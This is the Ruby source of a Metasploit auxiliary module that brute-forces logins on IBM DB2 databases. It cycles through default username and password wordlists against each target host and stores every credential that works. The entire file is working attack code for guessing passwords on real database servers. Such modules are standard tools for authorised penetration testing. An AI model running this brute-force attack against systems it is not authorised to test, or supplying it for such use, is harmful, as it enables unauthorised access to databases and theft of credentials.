## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/db2' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize super( 'Name' => 'DB2 Authentication Brute Force Utility', 'Description' => %q{This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.}, 'Author' => ['todb'], 'References' => [ [ 'CVE', '1999-0502'] # Weak password ], 'License' => MSF_LICENSE ) register_options( [ Opt::Proxies, OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line", File.join(Msf::Config.data_directory, "wordlists", "db2_default_userpass.txt") ]), OptPath.new('USER_FILE', [ false, "File containing users, one per line", File.join(Msf::Config.data_directory, "wordlists", "db2_default_user.txt") ]), OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", File.join(Msf::Config.data_directory, "wordlists", "db2_default_pass.txt") ]), ], self.class) end def run_host(ip) cred_collection = Metasploit::Framework::CredentialCollection.new( blank_passwords: datastore['BLANK_PASSWORDS'], pass_file: datastore['PASS_FILE'], password: datastore['PASSWORD'], user_file: datastore['USER_FILE'], userpass_file: datastore['USERPASS_FILE'], username: datastore['USERNAME'], user_as_pass: datastore['USER_AS_PASS'], realm: datastore['DATABASE'] ) cred_collection = prepend_db_passwords(cred_collection) scanner = Metasploit::Framework::LoginScanner::DB2.new( host: ip, port: rport, proxies: datastore['PROXIES'], cred_details: cred_collection, stop_on_success: datastore['STOP_ON_SUCCESS'], bruteforce_speed: datastore['BRUTEFORCE_SPEED'], connection_timeout: 30, max_send_size: datastore['TCP::max_send_size'], send_delay: datastore['TCP::send_delay'], framework: framework, framework_module: self, ssl: datastore['SSL'], ssl_version: datastore['SSLVersion'], ssl_verify_mode: datastore['SSLVerifyMode'], ssl_cipher: datastore['SSLCipher'], local_port: datastore['CPORT'], local_host: datastore['CHOST'] ) scanner.scan! do |result| credential_data = result.to_h credential_data.merge!( module_fullname: self.fullname, workspace_id: myworkspace_id ) if result.success? credential_core = create_credential(credential_data) credential_data[:core] = credential_core create_credential_login(credential_data) print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}" else invalidate_login(credential_data) vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})" end end end end